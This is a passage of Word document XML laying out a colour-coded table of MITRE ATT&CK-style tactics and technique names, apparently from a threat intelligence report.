                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Service Stop</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A9423C" w:rsidRPr="001019D3" w14:paraId="2119568B" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="412" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="127024CA" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="355" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="734002F7" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="79BEB6A9" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="336" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="92D050"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24727831" w14:textId="1FA2FB79" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Software Deployment Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5679C0F2" w14:textId="33E0D482" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Modify Authentication Process</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="296" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="92D050"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="17EBF941" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Valid Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="437" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52C5F752" w14:textId="41A1D619" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>File and Directory Permissions Modification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0FADF449" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Steal or Forge Authentication Certificates</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="445" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1F8152CA" w14:textId="512BABFA" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Local Storage Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F51C0B0" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="369" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E59E758" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Email Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A0CF8C8" w14:textId="125C0397" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Protocol Tunnelling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7EB0D403" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="60C2829B" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>System Shutdown/Reboot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="212582E3" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="004C32C3">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpY="181"/>
        <w:tblW w:w="5014" w:type="pct"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1139"/>
        <w:gridCol w:w="996"/>
        <w:gridCol w:w="568"/>
        <w:gridCol w:w="1132"/>
        <w:gridCol w:w="992"/>
        <w:gridCol w:w="850"/>
        <w:gridCol w:w="1729"/>
        <w:gridCol w:w="980"/>
        <w:gridCol w:w="2112"/>
        <w:gridCol w:w="850"/>
        <w:gridCol w:w="992"/>
        <w:gridCol w:w="992"/>
        <w:gridCol w:w="992"/>
        <w:gridCol w:w="529"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A9423C" w:rsidRPr="001019D3" w14:paraId="619E1044" w14:textId="77777777" w:rsidTr="002415FB">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5776618F" w14:textId="77777777" w:rsidR="00505537" w:rsidRPr="001019D3" w:rsidRDefault="00505537" w:rsidP="006D0130">
            <w:pPr>
              <w:keepLines/>
              <w:suppressAutoHyphens/>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73899E1C" w14:textId="77777777" w:rsidR="00505537" w:rsidRPr="001019D3" w:rsidRDefault="00505537" w:rsidP="002415FB">
            <w:pPr>
              <w:keepLines/>
              <w:suppressAutoHyphens/>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="-57" w:right="-57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Resource Development</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="191" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01839F59" w14:textId="77777777" w:rsidR="00505537" w:rsidRPr="001019D3" w:rsidRDefault="00505537" w:rsidP="00C84E88">
            <w:pPr>
              <w:keepLines/>
              <w:suppressAutoHyphens/>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3184C085" w14:textId="77777777" w:rsidR="00505537" w:rsidRPr="001019D3" w:rsidRDefault="00505537" w:rsidP="006D0130">
            <w:pPr>
              <w:keepLines/>
              <w:suppressAutoHyphens/>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4CDA8815" w14:textId="77777777" w:rsidR="00505537" w:rsidRPr="001019D3" w:rsidRDefault="00505537" w:rsidP="006D0130">
            <w:pPr>
              <w:keepLines/>
              <w:suppressAutoHyphens/>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="-113" w:right="-113"/>
              <w:contextualSpacing/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="76A363D5" w14:textId="77777777" w:rsidR="00505537" w:rsidRPr="001019D3" w:rsidRDefault="00505537" w:rsidP="006D0130">
            <w:pPr>
              <w:keepLines/>
              <w:suppressAutoHyphens/>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="582" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7539CE93" w14:textId="77777777" w:rsidR="00505537" w:rsidRPr="001019D3" w:rsidRDefault="00505537" w:rsidP="006D0130">
            <w:pPr>
              <w:keepLines/>
              <w:suppressAutoHyphens/>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="-57" w:right="-57"/>
              <w:contextualSpacing/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="45B6C255" w14:textId="77777777" w:rsidR="00505537" w:rsidRPr="001019D3" w:rsidRDefault="00505537" w:rsidP="006D0130">
            <w:pPr>
              <w:keepLines/>
              <w:suppressAutoHyphens/>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="711" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F4A0422" w14:textId="77777777" w:rsidR="00505537" w:rsidRPr="001019D3" w:rsidRDefault="00505537" w:rsidP="006D0130">
            <w:pPr>
              <w:keepLines/>
              <w:suppressAutoHyphens/>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="258D4A3F" w14:textId="77777777" w:rsidR="00505537" w:rsidRPr="001019D3" w:rsidRDefault="00505537" w:rsidP="006D0130">
            <w:pPr>
              <w:keepLines/>
              <w:suppressAutoHyphens/>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="-57" w:right="-57"/>
              <w:contextualSpacing/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="386607B6" w14:textId="77777777" w:rsidR="00505537" w:rsidRPr="001019D3" w:rsidRDefault="00505537" w:rsidP="006D0130">
            <w:pPr>
              <w:keepLines/>
              <w:suppressAutoHyphens/>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D42AD21" w14:textId="77777777" w:rsidR="00505537" w:rsidRPr="001019D3" w:rsidRDefault="00505537" w:rsidP="006D0130">
            <w:pPr>
              <w:keepLines/>
              <w:suppressAutoHyphens/>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="41F8A6ED" w14:textId="77777777" w:rsidR="00505537" w:rsidRPr="001019D3" w:rsidRDefault="00505537" w:rsidP="006D0130">
            <w:pPr>
              <w:keepLines/>
              <w:suppressAutoHyphens/>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B28A710" w14:textId="77777777" w:rsidR="00505537" w:rsidRPr="001019D3" w:rsidRDefault="00505537" w:rsidP="006D0130">
            <w:pPr>
              <w:keepLines/>
              <w:suppressAutoHyphens/>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A9423C" w:rsidRPr="001019D3" w14:paraId="0AFFE69C" w14:textId="77777777" w:rsidTr="00591FD8">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07E2D97F" w14:textId="77777777" w:rsidR="00F004ED" w:rsidRPr="001019D3" w:rsidRDefault="00F004ED" w:rsidP="00F004ED">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24BE99FB" w14:textId="77777777" w:rsidR="00F004ED" w:rsidRPr="001019D3" w:rsidRDefault="00F004ED" w:rsidP="00F004ED">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="191" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F25F88B" w14:textId="77777777" w:rsidR="00F004ED" w:rsidRPr="001019D3" w:rsidRDefault="00F004ED" w:rsidP="00F004ED">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2EBCB57A" w14:textId="06EF6791" w:rsidR="00F004ED" w:rsidRPr="001019D3" w:rsidRDefault="00F004ED" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>System Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="188AE004" w14:textId="2D61054C" w:rsidR="00F004ED" w:rsidRPr="001019D3" w:rsidRDefault="00F004ED" w:rsidP="00F004ED">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Modify Registry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
